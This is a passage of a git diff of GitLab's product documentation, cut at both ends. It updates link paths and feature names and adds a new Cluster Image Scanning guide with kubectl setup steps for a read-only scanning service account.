a/doc/user/admin_area/settings/img/help_page_help_text_ex_v12_3.png +++ /dev/null diff --git a/doc/user/admin_area/settings/img/help_page_help_text_v12_3.png b/doc/user/admin_area/settings/img/help_page_help_text_v12_3.png Binary files differdeleted file mode 100644 index 8848ea55cf3..00000000000 --- a/doc/user/admin_area/settings/img/help_page_help_text_v12_3.png +++ /dev/null diff --git a/doc/user/admin_area/settings/index.md b/doc/user/admin_area/settings/index.md index 6a5af09358d..d21b6c36224 100644 --- a/doc/user/admin_area/settings/index.md +++ b/doc/user/admin_area/settings/index.md @@ -68,7 +68,7 @@ To access the default page for Admin Area settings: | Option | Description | | ------ | ----------- | | [Continuous Integration and Deployment](continuous_integration.md) | Auto DevOps, runners and job artifacts. | -| [Required pipeline configuration](continuous_integration.md#required-pipeline-configuration) **(PREMIUM SELF)** | Set an instance-wide auto included [pipeline configuration](../../../ci/yaml/README.md). This pipeline configuration is run after the project's own configuration. | +| [Required pipeline configuration](continuous_integration.md#required-pipeline-configuration) **(PREMIUM SELF)** | Set an instance-wide auto included [pipeline configuration](../../../ci/yaml/index.md). This pipeline configuration is run after the project's own configuration. | | [Package Registry](continuous_integration.md#package-registry-configuration) | Settings related to the use and experience of using the GitLab Package Registry. Note there are [risks involved](../../packages/container_registry/index.md#use-with-external-container-registries) in enabling some of these settings. | ## Reporting @@ -86,7 +86,7 @@ To access the default page for Admin Area settings: | [Metrics - Grafana](../../../administration/monitoring/performance/grafana_configuration.md#integration-with-gitlab-ui) | Enable and configure Grafana. | | [Profiling - Performance bar](../../../administration/monitoring/performance/performance_bar.md#enable-the-performance-bar-via-the-admin-area) | Enable access to the Performance Bar for a given group. | | [Self monitoring](../../../administration/monitoring/gitlab_self_monitoring_project/index.md#creating-the-self-monitoring-project) | Enable or disable instance self monitoring. | -| [Usage statistics](usage_statistics.md) | Enable or disable version check and usage ping. | +| [Usage statistics](usage_statistics.md) | Enable or disable version check and Service Ping. | | [Pseudonymizer data collection](../../../administration/pseudonymizer.md) **(ULTIMATE)** | Enable or disable the Pseudonymizer data collection. | ## Network diff --git a/doc/user/admin_area/settings/sign_in_restrictions.md b/doc/user/admin_area/settings/sign_in_restrictions.md index ecd259a345c..333e9465c31 100644 --- a/doc/user/admin_area/settings/sign_in_restrictions.md +++ b/doc/user/admin_area/settings/sign_in_restrictions.md @@ -21,7 +21,7 @@ To access sign-in restriction settings: You can restrict the password authentication for web interface and Git over HTTP(S): -- **Web interface**: When this feature is disabled, the **Standard** sign-in tab is removed and an [external authentication provider](../../../administration/auth/README.md) must be used. +- **Web interface**: When this feature is disabled, the **Standard** sign-in tab is removed and an [external authentication provider](../../../administration/auth/index.md) must be used. - **Git over HTTP(S)**: When this feature is disabled, a [Personal Access Token](../../profile/personal_access_tokens.md) must be used to authenticate. ## Admin Mode diff --git a/doc/user/admin_area/settings/third_party_offers.md b/doc/user/admin_area/settings/third_party_offers.md index e7fa8b1dc40..6f7cb081315 100644 --- a/doc/user/admin_area/settings/third_party_offers.md +++ b/doc/user/admin_area/settings/third_party_offers.md @@ -5,7 +5,7 @@ info: To determine the technical writer assigned to the Stage/Group associated w type: reference --- -# Third party offers **(FREE SELF)** +# Third-party offers **(FREE SELF)** > [Introduced](https://gitlab.com/gitlab-org/gitlab-foss/-/merge_requests/20379) in GitLab Free 11.1. @@ -16,8 +16,9 @@ for using [Google Kubernetes Engine](https://cloud.google.com/kubernetes-engine/ To toggle the display of third-party offers: 1. On the top bar, select **Menu >** **{admin}** **Admin**. -1. In the left sidebar, select **Settings**, and expand **Third party offers**. -1. Select **Do not display offers from third parties within GitLab**. +1. On the left sidebar, select **Settings**, and expand **Third-party offers**. +1. Select **Do not display offers from third parties**. +1. Select **Save changes**. <!-- ## Troubleshooting diff --git a/doc/user/admin_area/settings/usage_statistics.md b/doc/user/admin_area/settings/usage_statistics.md index b5a7ce318ff..c12b720edd2 100644 --- a/doc/user/admin_area/settings/usage_statistics.md +++ b/doc/user/admin_area/settings/usage_statistics.md @@ -14,7 +14,7 @@ All statistics are opt-out. To enable or disable them: 1. On the top bar, select **Menu >** **{admin}** **Admin**. 1. In the left sidebar, select **Settings > Metrics and profiling**, and expand **Usage statistics**. -1. Enable or disable **Version check** and **Usage ping**. +1. Enable or disable **Version check** and **Service ping**. 1. Select **Save changes**. ## Network configuration @@ -67,14 +67,14 @@ sequenceDiagram Version Application->>GitLab instance: Response (PNG/SVG) ``` -## Usage Ping **(FREE SELF)** +## Service Ping **(FREE SELF)** -See [Usage Ping guide](../../../development/usage_ping/index.md). +See [Service Ping guide](../../../development/service_ping/index.md). ## Instance-level analytics availability -After usage ping is enabled, GitLab gathers data from other instances and -enables certain [instance-level analytics features](../analytics/index.md) that are dependent on usage ping. +After Service Ping is enabled, GitLab gathers data from other instances and +enables certain [instance-level analytics features](../analytics/index.md) that are dependent on Service Ping. <!-- ## Troubleshooting diff --git a/doc/user/admin_area/settings/visibility_and_access_controls.md b/doc/user/admin_area/settings/visibility_and_access_controls.md index 752856371bf..4af33c133a4 100644 --- a/doc/user/admin_area/settings/visibility_and_access_controls.md +++ b/doc/user/admin_area/settings/visibility_and_access_controls.md @@ -97,7 +97,8 @@ To change this period: Alternatively, projects that are marked for removal can be deleted immediately. To do so: 1. [Restore the project](../../project/settings/#restore-a-project). -1. Delete the project as described in the [Administering Projects page](../../admin_area/#administering-projects). +1. Delete the project as described in the + [Administering Projects page](../../admin_area/#administering-projects). ## Default project visibility @@ -106,7 +107,8 @@ To set the default visibility levels for new projects: 1. Select the desired default project visibility. 1. Click **Save changes**. -For more details on project visibility, see [Public access](../../../public_access/public_access.md). +For more details on project visibility, see +[Project visibility](../../../public_access/public_access.md). ## Default snippet visibility @@ -115,7 +117,8 @@ To set the default visibility levels for new snippets: 1. Select the desired default snippet visibility. 1. Click **Save changes**. -For more details on snippet visibility, see [Public access](../../../public_access/public_access.md). +For more details on snippet visibility, see +[Project visibility](../../../public_access/public_access.md). ## Default group visibility @@ -124,7 +127,8 @@ To set the default visibility levels for new groups: 1. Select the desired default group visibility. 1. Click **Save changes**. -For more details on group visibility, see [Public access](../../../public_access/public_access.md). +For more details on group visibility, see +[Group visibility](../../group/index.md#group-visibility). ## Restricted visibility levels @@ -133,7 +137,8 @@ To set the restricted visibility levels for projects, snippets, and selected pag 1. Select the desired visibility levels to restrict. 1. Select **Save changes**. -For more details on project visibility, see [Public access](../../../public_access/public_access.md). +For more details on project visibility, see +[Project visibility](../../../public_access/public_access.md). ## Import sources diff --git a/doc/user/analytics/ci_cd_analytics.md b/doc/user/analytics/ci_cd_analytics.md index 1fce741cbef..3c80e1f5f2a 100644 --- a/doc/user/analytics/ci_cd_analytics.md +++ b/doc/user/analytics/ci_cd_analytics.md @@ -50,9 +50,9 @@ The following table shows the supported metrics, at which level they are support | Metric | Level | API version | Chart (UI) version | Comments | |---------------------------|---------------------|--------------------------------------|---------------------------------------|-----------| | `deployment_frequency` | Project-level | [13.7+](../../api/dora/metrics.md) | [13.8+](#deployment-frequency-charts) | The [old API endpoint](../../api/dora4_project_analytics.md) was [deprecated](https://gitlab.com/gitlab-org/gitlab/-/issues/323713) in 13.10. | -| `deployment_frequency` | Group-level | [13.10+](../../api/dora/metrics.md) | To be supported | | +| `deployment_frequency` | Group-level | [13.10+](../../api/dora/metrics.md) | [13.12+](#deployment-frequency-charts) | | | `lead_time_for_changes` | Project-level | [13.10+](../../api/dora/metrics.md) | [13.11+](#lead-time-charts) | Unit in seconds. Aggregation method is median. | -| `lead_time_for_changes` | Group-level | [13.10+](../../api/dora/metrics.md) | To be supported | Unit in seconds. Aggregation method is median. | +| `lead_time_for_changes` | Group-level | [13.10+](../../api/dora/metrics.md) | [14.0+](#lead-time-charts) | Unit in seconds. Aggregation method is median. | | `change_failure_rate` | Project/Group-level | To be supported | To be supported | | | `time_to_restore_service` | Project/Group-level | To be supported | To be supported | | diff --git a/doc/user/analytics/value_stream_analytics.md b/doc/user/analytics/value_stream_analytics.md index c3b3fcba52e..4ad3a03a5b0 100644 --- a/doc/user/analytics/value_stream_analytics.md +++ b/doc/user/analytics/value_stream_analytics.md @@ -58,9 +58,9 @@ The **Time** metrics near the top of the page are measured as follows: ## How the stages are measured -Value Stream Analytics uses start events and stop events to measure the time that an issue or merge request spends in each stage. +Value Stream Analytics uses start events and end events to measure the time that an issue or merge request spends in each stage. For example, a stage might start when one label is added to an issue and end when another label is added. -Items aren't included in the stage time calculation if they have not reached the stop event. +Items aren't included in the stage time calculation if they have not reached the end event. | Stage | Description | |---------|---------------| @@ -112,7 +112,7 @@ environments is configured. 1. Push branch, and create a merge request that contains the [issue closing pattern](../project/issues/managing_issues.md#closing-issues-automatically) in its description at 14:00 (stop of **Code** stage and start of **Test** and **Review** stages). -1. The CI starts running your scripts defined in [`.gitlab-ci.yml`](../../ci/yaml/README.md) and +1. The CI starts running your scripts defined in [`.gitlab-ci.yml`](../../ci/yaml/index.md) and takes 5 minutes (stop of **Test** stage). 1. Review merge request, ensure that everything is okay, and then merge the merge request at 19:00 (stop of **Review** stage and start of **Staging** stage). diff --git a/doc/user/application_security/api_fuzzing/create_har_files.md b/doc/user/application_security/api_fuzzing/create_har_files.md index 1162984a02d..7940e072420 100644 --- a/doc/user/application_security/api_fuzzing/create_har_files.md +++ b/doc/user/application_security/api_fuzzing/create_har_files.md @@ -12,7 +12,7 @@ requests and HTTP responses. A HAR file's content is JSON formatted, containing with a web site. The file extension `.har` is commonly used. The HAR files can be used to perform [web API Fuzz Testing](index.md#http-archive-har) as part of -your [GitLab CI/CD](../../../ci/README.md) pipelines. +your [GitLab CI/CD](../../../ci/index.md) pipelines. WARNING: A HAR file stores information exchanged between web client and web server. It could also diff --git a/doc/user/application_security/api_fuzzing/index.md b/doc/user/application_security/api_fuzzing/index.md index 2b2ac76a7af..e35415003c7 100644 --- a/doc/user/application_security/api_fuzzing/index.md +++ b/doc/user/application_security/api_fuzzing/index.md @@ -13,7 +13,7 @@ backend. This helps you discover bugs and potential security issues that other Q miss. We recommend that you use fuzz testing in addition to [GitLab Secure](../index.md)'s -other security scanners and your own test processes. If you're using [GitLab CI/CD](../../../ci/README.md), +other security scanners and your own test processes. If you're using [GitLab CI/CD](../../../ci/index.md), you can run fuzz tests as part your CI/CD workflow. ## When Web API fuzzing runs @@ -134,7 +134,7 @@ To configure API fuzzing in GitLab with an OpenAPI Specification: 1. Add the `fuzz` stage to your `.gitlab-ci.yml` file. -1. [Include](../../../ci/yaml/README.md#includetemplate) +1. [Include](../../../ci/yaml/index.md#includetemplate) the [`API-Fuzzing.gitlab-ci.yml` template](https://gitlab.com/gitlab-org/gitlab/-/blob/master/lib/gitlab/ci/templates/Security/API-Fuzzing.gitlab-ci.yml) in your `.gitlab-ci.yml` file. @@ -200,7 +200,7 @@ To configure API fuzzing to use a HAR file: 1. Add the `fuzz` stage to your `.gitlab-ci.yml` file. -1. [Include](../../../ci/yaml/README.md#includetemplate) +1. [Include](../../../ci/yaml/index.md#includetemplate) the [`API-Fuzzing.gitlab-ci.yml` template](https://gitlab.com/gitlab-org/gitlab/-/blob/master/lib/gitlab/ci/templates/Security/API-Fuzzing.gitlab-ci.yml) in your `.gitlab-ci.yml` file. @@ -271,7 +271,7 @@ To configure API fuzzing to use a Postman Collection file: 1. Add the `fuzz` stage to your `.gitlab-ci.yml` file. -1. [Include](../../../ci/yaml/README.md#includetemplate) +1. [Include](../../../ci/yaml/index.md#includetemplate) the [`API-Fuzzing.gitlab-ci.yml` template](https://gitlab.com/gitlab-org/gitlab/-/blob/master/lib/gitlab/ci/templates/Security/API-Fuzzing.gitlab-ci.yml) in your `.gitlab-ci.yml` file. @@ -400,7 +400,7 @@ To use HTTP basic authentication, two CI/CD variables are added to your `.gitlab - `FUZZAPI_HTTP_USERNAME`: The username for authentication. - `FUZZAPI_HTTP_PASSWORD`: The password for authentication. -For the password, we recommended that you [create a CI/CD variable](../../../ci/variables/README.md#custom-cicd-variables) +For the password, we recommended that you [create a CI/CD variable](../../../ci/variables/index.md#custom-cicd-variables) (for example, `TEST_API_PASSWORD`) set to the password. You can create CI/CD variables from the GitLab projects page at **Settings > CI/CD**, in the **Variables** section. Use that variable as the value for `FUZZAPI_HTTP_PASSWORD`: @@ -438,7 +438,7 @@ outgoing HTTP requests. Follow these steps to provide the bearer token with `FUZZAPI_OVERRIDES_ENV`: -1. [Create a CI/CD variable](../../../ci/variables/README.md#custom-cicd-variables), +1. [Create a CI/CD variable](../../../ci/variables/index.md#custom-cicd-variables), for example `TEST_API_BEARERAUTH`, with the value `{"headers":{"Authorization":"Bearer dXNlcm5hbWU6cGFzc3dvcmQ="}}` (substitute your token). You can create CI/CD variables from the GitLab projects page at **Settings > CI/CD**, in the @@ -780,7 +780,7 @@ variables: ``` In this example `.gitlab-ci.yml`, the `SECRET_OVERRIDES` variable provides the JSON. This is a -[group or instance level CI/CD variable defined in the UI](../../../ci/variables/README.md#add-a-cicd-variable-to-an-instance): +[group or instance level CI/CD variable defined in the UI](../../../ci/variables/index.md#add-a-cicd-variable-to-an-instance): ```yaml stages: diff --git a/doc/user/application_security/cluster_image_scanning/index.md b/doc/user/application_security/cluster_image_scanning/index.md new file mode 100644 index 00000000000..abbe00a85ab --- /dev/null +++ b/doc/user/application_security/cluster_image_scanning/index.md @@ -0,0 +1,281 @@ +--- +type: reference, howto +stage: Protect +group: Container Security +info: To determine the technical writer assigned to the Stage/Group associated with this page, see https://about.gitlab.com/handbook/engineering/ux/technical-writing/#assignments +--- + +# Cluster Image Scanning **(ULTIMATE)** + +> [Introduced](https://gitlab.com/gitlab-org/gitlab/-/merge_requests/) in [GitLab Ultimate](https://about.gitlab.com/pricing/) 14.1. + +WARNING: +This analyzer is in [Alpha](https://about.gitlab.com/handbook/product/gitlab-the-product/#alpha) +and is unstable. The JSON report and CI/CD configuration may be subject to change or breakage +across GitLab releases. + +Your Kubernetes cluster may run workloads based on images that the Container Security analyzer +didn't scan. These images may therefore contain known vulnerabilities. By including an extra job in +your pipeline that scans for those security risks and displays them in the vulnerability report, you +can use GitLab to audit your Kubernetes workloads and environments. + +GitLab provides integration with open-source tools for vulnerability analysis in Kubernetes clusters: + +- [Starboard](https://github.com/aquasecurity/starboard) + +To integrate GitLab with security scanners other than those listed here, see +[Security scanner integration](../../../development/integrations/secure.md). + +You can enable cluster image scanning by [including the CI job](#configuration) +in your existing `.gitlab-ci.yml` file. + +## Prerequisites + +To enable cluster image scanning in your pipeline, you need the following: + +- [GitLab Runner](https://docs.gitlab.com/runner/) + with the [`docker`](https://docs.gitlab.com/runner/executors/docker.html) + or [`kubernetes`](https://docs.gitlab.com/runner/install/kubernetes.html) + executor. +- Docker `18.09.03` or later installed on the same computer as the runner. If you're using the + shared runners on GitLab.com, then this is already the case. +- [Starboard Operator](https://aquasecurity.github.io/starboard/v0.10.3/operator/installation/kubectl/) + installed and configured in your cluster. +- The configuration for accessing your Kubernetes cluster stored in the `CIS_KUBECONFIG` + [configuration variable](#cicd-variables-for-cluster-image-scanning) + with the type set to `File` (see [Configuring the cluster](#configuring-the-cluster)). + +## Configuring the cluster + +1. Create a new service account. + + To properly fetch vulnerabilities from the cluster and to limit analyzer access to the workload, + you must create a new service account with the cluster role limited to `get`, `list`, and `watch` + `vulnerabilityreports` in the Kubernetes cluster: + + ```shell + kubectl apply -f https://gitlab.com/gitlab-org/security-products/analyzers/cluster-image-scanning/-/raw/main/gitlab-vulnerability-viewer-service-account.yaml + ``` + +1. Obtain the Kubernetes API URL. + + Get the API URL by running this command: + + ```shell + API_URL=$(kubectl cluster-info | grep -E 'Kubernetes master|Kubernetes control plane' | awk '/http/ {print $NF}') + ``` + +1. Obtain the CA certificate: + + 1. List the secrets with `kubectl get secrets`. One should have a name similar to + `default-token-xxxxx`. Copy that token name for use below. + + 1. Run this command to get the certificate: + + ```shell + CA_CERTIFICATE=$(kubectl get secret <secret name> -o jsonpath="{['data']['ca\.crt']}") + ``` + +1. Obtain the service account token: + + ```shell + TOKEN=$(kubectl -n kube-system get secret $(kubectl -n kube-system get secret | grep gitlab-vulnerability-viewer | awk '{print $1}') -o jsonpath="{.data.token}" | base64 --decode) + ``` + +1. Generate the value for the `CIS_KUBECONFIG` variable. Copy the printed value from the output: + + ```shell + echo " + --- + apiVersion: v1 + kind: Config + clusters: + - name: gitlab-vulnerabilities-viewer + cluster: + server: $API_URL + certificate-authority-data: $CA_CERTIFICATE + contexts: + - name: gitlab-vulnerabilities-viewer + context: + cluster: gitlab-vulnerabilities-viewer + namespace: default + user: gitlab-vulnerabilities-viewer + current-context: gitlab-vulnerabilities-viewer + users: + - name: gitlab-vulnerabilities-viewer + user: + token: $TOKEN + " + ``` + +1. Set the CI/CD variable: + + 1. Navigate to your project's **Settings > CI/CD**. + + 1. Expand the **Variables** section. + + 1. Select **Add variable** and fill in the details: + + - **Key**: `CIS_KUBECONFIG`. + - **Value**: `generated value` + - **Type**: `File` + +WARNING: +The `CIS_KUBECONFIG` variable is accessible by all jobs executed for your project. Mark the +`Protect variable` flag to export this variable to pipelines running on protected branches and tags +only. You can apply additional protection to your cluster by +[restricting service account access to a single namespace](https://kubernetes.io/docs/reference/access-authn-authz/rbac/), +and [configuring Starboard Operator](https://aquasecurity.github.io/starboard/v0.10.3/operator/configuration/#install-modes) +to install in restricted mode. + +## Configuration + +To include the `Cluster-Image-Scanning.gitlab-ci.yml` template (GitLab 14.1 and later), add the +following to your `.gitlab-ci.yml` file: + +```yaml +include: + - template: Security/Cluster-Image-Scanning.gitlab-ci.yml +``` + +The included template: + +- Creates a `cluster_image_scanning` job in your CI/CD pipeline. +- Connects to your Kubernetes cluster with credentials provided in the `CIS_KUBECONFIG` variable and + fetches vulnerabilities found by [Starboard Operator](https://aquasecurity.github.io/starboard/v0.10.3/operator/). + +GitLab saves the results as a +[Cluster Image Scanning report artifact](../../../ci/yaml/index.md#artifactsreportscluster_image_scanning) +that you can download and analyze later. When downloading, you always receive the most recent +artifact. + +### Customize the cluster image scanning settings + +You can customize how GitLab scans your cluster. For example, to restrict the analyzer to get +results for only a certain workload, use the [`variables`](../../../ci/yaml/index.md#variables) +parameter in your `.gitlab-ci.yml` to set [CI/CD variables](#cicd-variables-for-cluster-image-scanning). +The variables you set in your `.gitlab-ci.yml` overwrite those in +`Cluster-Image-Scanning.gitlab-ci.yml`. + +#### CI/CD variables for cluster image scanning + +You can [configure](#customize-the-cluster-image-scanning-settings) analyzers by using the following CI/CD variables: + +| CI/CD Variable | Default | Description | +| ------------------------------ | ------------- | ----------- | +| `CIS_KUBECONFIG` | `""` | File used to configure access to the Kubernetes cluster. See the [Kubernetes documentation](https://kubernetes.io/docs/tasks/access-application-cluster/configure-access-multiple-clusters/) for more details. | +| `CIS_CONTAINER_NAME` | `""` | Name of the container used in the Kubernetes resource you want to filter vulnerabilities for. For example, `alpine`. | +| `CIS_RESOURCE_NAME` | `""` | Name of the Kubernetes resource you want to filter vulnerabilities for. For example, `nginx`. | +| `CIS_RESOURCE_NAMESPACE` | `""` | Namespace of the Kubernetes resource you want to filter vulnerabilities for. For example, `production`. | +| `CIS_RESOURCE_KIND` | `""` | Kind of the Kubernetes resource you want to filter vulnerabilities for. For example, `deployment`. | + +### Override the cluster image scanning template + +If you want to override the job definition (for example, to change properties like `variables`), you +must declare and override a job after the template inclusion, and then +specify any additional keys. + +This example sets `CIS_RESOURCE_NAME` to `nginx`: + +```yaml +include: + - template: Security/Cluster-Image-Scanning.gitlab-ci.yml + +cluster_image_scanning: + variables: + CIS_RESOURCE_NAME: nginx +``` + +### Connect with Kubernetes cluster associated to the project + +If you want to connect to the Kubernetes cluster associated with the project and run Cluster Image Scanning jobs without +configuring the `CIS_KUBECONFIG` variable, you must extend `cluster_image_scanning` and specify the environment you want to scan. + +This example configures the `cluster_image_scanning` job to scan the Kubernetes cluster connected with the `staging` environment: + +```yaml +cluster_image_scanning: + environment: + name: staging + action: prepare +``` + +## Reports JSON format + +The cluster image scanning tool emits a JSON report file. For more information, see the +[schema for this report](https://gitlab.com/gitlab-org/security-products/security-report-schemas/-/blob/master/dist/container-scanning-report-format.json). + +Here's an example cluster image scanning report: + +```json-doc +{{ + "version": "14.0.2", + "scan": { + "scanner": { + "id": "starboard_trivy", + "name": "Trivy (using Starboard Operator)", + "url": "https://github.com/aquasecurity/starboard", + "vendor": { + "name": "GitLab" + }, + "version": "0.16.0" + }, + "start_time": "2021-04-28T12:47:00Z", + "end_time": "2021-04-28T12:47:00Z", + "type": "cluster_image_scanning", + "status": "success" + }, + "vulnerabilities": [ + { + "id": "c15f22205ee842184c2d55f1a207b3708283353f85083d66c34379c709b0ac9d", + "category": "cluster_image_scanning", + "message": "CVE-2011-3374 in apt", + "description": "", + "cve": "library/nginx:1.18:apt:CVE-2011-3374", + "severity": "Low", + "confidence": "Unknown", + "solution": "Upgrade apt from 1.8.2.2", + "scanner": { + "id": "starboard_trivy", + "name": "Trivy (using Starboard Operator)" + }, + "location": { + "dependency": { + "package": { + "name": "apt" + }, + "version": "1.8.2.2" + }, + "operating_system": "library/nginx:1.18", + "image": "index.docker.io/library/nginx:1.18" + }, + "identifiers": [ + { + "type": "cve", + "name": "CVE-2011-3374", + "value": "CVE-2011-3374", + "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3374" + } + ], + "links": [ + "https://avd.aquasec.com/nvd/cve-2011-3374" + ] + } + ] +} +``` + +## Security Dashboard + +The [Security Dashboard](../security_dashboard/index.md) shows you an overview of all +the security vulnerabilities in your groups, projects, and pipelines. + +## Interacting with the vulnerabilities + +After a vulnerability is found, you can [address it](../vulnerabilities/index.md). + +## Troubleshooting + +### Getting warning message `gl-cluster-image-scanning-report.json: no matching files` + +For information on this error, see the [general Application Security troubleshooting section](../../../ci/pipelines/job_artifacts.md#error-message-no-files-to-upload). diff --git a/doc/user/application_security/configuration/index.md b/doc/user/application_security/configuration/index.md index 8c34303ca00..3cc88a40b6f 100644 --- a/doc/user/application_security/configuration/index.md +++ b/doc/user/application_security/configuration/index.md @@ -25,6 +25,32 @@ For each security control the page displays: - **Security Control:** Name, description, and a documentation link. - **Manage:** A management option or a documentation link. +## UI redesign + +> - [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/326926) in 14.0 for GitLab Free and Premium, behind a feature flag, disabled by default. +> - Enabled on GitLab.com for Free & Premium. +> - Recommended for production use. +> - It can be enabled or disabled for a single project. +> - To use in GitLab self-managed instances, ask a GitLab administrator to [enable it](#enable-or-disable-ui-redesign). **(FREE SELF)** +> - [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/333109) in 14.1 for GitLab Ultimate, behind a feature flag, disabled by default. +> - Disabled on GitLab.com. +> - Not recommended for production use. +> - It can be enabled or disabled for a single project. +> - To use in GitLab self-managed instances, ask a GitLab administrator to [enable it](#enable-or-disable-ui-redesign-for-ultimate). **(ULTIMATE SELF)** + +WARNING: +This feature might not be available to you. Check the **version history** note above for details. + +The Security Configuration page has been redesigned in GitLab Free and Premium. +The same functionality exists as before, but presented in a more extensible +way. + +For each security control the page displays: + +- Its name, description and a documentation link. +- Whether or not it is available. +- A configuration button or a link to its configuration guide. + ## Status **(ULTIMATE)** > - [Introduced](https://gitlab.com/gitlab-org/gitlab/-/merge_requests/20711) in [GitLab Ultimate](https://about.gitlab.com/pricing/) 12.6. @@ -52,3 +78,56 @@ You can configure the following security controls: - Secret Detection - Select **Configure via Merge Request** to create a merge request with the changes required to enable Secret Detection. For more details, see [Enable Secret Detection via an automatic merge request](../secret_detection/index.md#enable-secret-detection-via-an-automatic-merge-request). +- Dependency Scanning + - Select **Configure via Merge Request** to create a merge request with the changes required to + enable Dependency Scanning. For more details, see [Enable Dependency Scanning via an automatic merge request](../dependency_scanning/index.md#enable-dependency-scanning-via-an-automatic-merge-request). + +## Enable or disable UI redesign **(FREE SELF)** + +The Security Configuration redesign is under development, but is ready for +production use. It is deployed behind a feature flag that is **disabled by +default**. +[GitLab administrators with access to the GitLab Rails console](../../../administration/feature_flags.md) can enable it. + +To enable it: + +```ruby +# For the instance +Feature.enable(:security_configuration_redesign) +# For a single project +Feature.enable(:security_configuration_redesign, Project.find(<project id>)) +``` + +To disable it: + +```ruby +# For the instance +Feature.disable(:security_configuration_redesign) +# For a single project +Feature.disable(:security_configuration_redesign, Project.find(<project id>)) +``` + +## Enable or disable UI redesign for Ultimate **(ULTIMATE SELF)** + +The Security Configuration redesign is under development, and is not ready for +production use. It is deployed behind a feature flag that is **disabled by +default**. +[GitLab administrators with access to the GitLab Rails console](../../../administration/feature_flags.md) can enable it. + +To enable it: + +```ruby +# For the instance +Feature.enable(:security_configuration_redesign_ee) +# For a single project +Feature.enable(:security_configuration_redesign_ee, Project.find(<project id>)) +``` + +To disable it: + +```ruby +# For the instance +Feature.disable(:security_configuration_redesign_ee) +# For a single project +Feature.disable(:security_configuration_redesign_ee, Project.find(<project id>)) +``` diff --git a/doc/user/application_security/container_scanning/index.md b/doc/user/application_security/container_scanning/index.md index 323a064c3e4..90e1e4b025c 100644 --- a/doc/user/application_security/container_scanning/index.md +++ b/doc/user/application_security/container_scanning/index.md @@ -59,7 +59,7 @@ To enable container scanning in your pipeline, you need the following: How you enable container scanning depends on your GitLab version: -- GitLab 11.9 and later: [Include](../../../ci/yaml/README.md#includetemplate) the +- GitLab 11.9 and later: [Include](../../../ci/yaml/index.md#includetemplate) the [`Container-Scanning.gitlab-ci.yml` template](https://gitlab.com/gitlab-org/gitlab/-/blob/master/lib/gitlab/ci/templates/Security/Container-Scanning.gitlab-ci.yml) that comes with your GitLab installation. - GitLab versions earlier than 11.9: Copy and use the job from the @@ -73,8 +73,8 @@ Other changes: [`centos:centos8`](https://hub.docker.com/_/centos) as the new base. It also removes the use of the [start.sh](https://gitlab.com/gitlab-org/security-products/analyzers/klar/-/merge_requests/77) script and instead executes the analyzer by default. Any customizations made to the - `container_scanning` job's [`before_script`](../../../ci/yaml/README.md#before_script) - and [`after_script`](../../../ci/yaml/README.md#after_script) + `container_scanning` job's [`before_script`](../../../ci/yaml/index.md#before_script) + and [`after_script`](../../../ci/yaml/index.md#after_script) blocks may not work with the new version. To roll back to the previous [`alpine:3.11.3`](https://hub.docker.com/_/alpine)-based Docker image, you can specify the major version through the [`CS_MAJOR_VERSION`](#available-cicd-variables) variable. @@ -101,7 +101,7 @@ The included template: (see [requirements](#requirements)) and scans it for possible vulnerabilities. GitLab saves the results as a -[Container Scanning report artifact](../../../ci/yaml/README.md#artifactsreportscontainer_scanning) +[Container Scanning report artifact](../../../ci/yaml/index.md#artifactsreportscontainer_scanning) that you can download and analyze later. When downloading, you always receive the most-recent artifact. @@ -130,12 +130,12 @@ include: There may be cases where you want to customize how GitLab scans your containers. For example, you may want to enable more verbose output, access a Docker registry that requires -authentication, and more. To change such settings, use the [`variables`](../../../ci/yaml/README.md#variables) +authentication, and more. To change such settings, use the [`variables`](../../../ci/yaml/index.md#variables) parameter in your `.gitlab-ci.yml` to set [CI/CD variables](#available-cicd-variables). The variables you set in your `.gitlab-ci.yml` overwrite those in `Container-Scanning.gitlab-ci.yml`. -This example [includes](../../../ci/yaml/README.md#include) the container scanning template and +This example [includes](../../../ci/yaml/index.md#include) the container scanning template and enables verbose output for the analyzer: ```yaml @@ -172,6 +172,21 @@ Support depends on the scanner: - [Grype](https://github.com/anchore/grype#grype) - [Trivy](https://aquasecurity.github.io/trivy/latest/vuln-detection/os/) (Default). +#### UBI-based images + +> [Introduced](https://gitlab.com/groups/gitlab-org/-/epics/5775) in [GitLab Ultimate](https://about.gitlab.com/pricing/) 14.1. + +GitLab also offers [Red Hat UBI](https://www.redhat.com/en/blog/introducing-red-hat-universal-base-image) +versions of the container-scanning images. You can therefore replace standard images with UBI-based +images. To configure the images, set the `CS_ANALYZER_IMAGE` variable to the standard tag plus the +`-ubi` extension. + +| Scanner name | `CS_ANALYZER_IMAGE` | +| --------------- | ------------------- | +| Default (Trivy) | `registry.gitlab.com/security-products/container-scanning:4-ubi` | +| Grype | `registry.gitlab.com/security-products/container-scanning/grype:4-ubi` | +| Trivy | `registry.gitlab.com/security-products/container-scanning/trivy:4-ubi` | + ### Overriding the container scanning template If you want to override the job definition (for example, to change properties like `variables`), you @@ -189,11 +204,6 @@ container_scanning: GIT_STRATEGY: fetch ``` -WARNING: -GitLab 13.0 and later doesn't support [`only` and `except`](../../../ci/yaml/README.md#only--except). -When overriding the template, you must use [`rules`](../../../ci/yaml/README.md#rules) -instead. - ### Change scanners The container-scanning analyzer can use different scanners, depending on the value of the @@ -256,7 +266,7 @@ container_scanning: -----END CERTIFICATE----- ``` -The `ADDITIONAL_CA_CERT_BUNDLE` value can also be configured as a [custom variable in the UI](../../../ci/variables/README.md#custom-cicd-variables), either as a `file`, which requires the path to the certificate, or as a variable, which requires the text representation of the certificate. +The `ADDITIONAL_CA_CERT_BUNDLE` value can also be configured as a [custom variable in the UI](../../../ci/variables/index.md#custom-cicd-variables), either as a `file`, which requires the path to the certificate, or as a variable, which requires the text representation of the certificate. ### Vulnerability allowlisting diff --git a/doc/user/application_security/coverage_fuzzing/index.md b/doc/user/application_security/coverage_fuzzing/index.md index b46547b6828..679d20a6394 100644 --- a/doc/user/application_security/coverage_fuzzing/index.md +++ b/doc/user/application_security/coverage_fuzzing/index.md @@ -13,7 +13,7 @@ random inputs to an instrumented version of your application in an effort to cau behavior, such as a crash. Such behavior indicates a bug that you should address. We recommend that you use fuzz testing in addition to the other security scanners in [GitLab Secure](../index.md) -and your own test processes. If you're using [GitLab CI/CD](../../../ci/README.md), +and your own test processes. If you're using [GitLab CI/CD](../../../ci/index.md), you can run your coverage-guided fuzz tests as part your CI/CD workflow. You can take advantage of coverage-guided 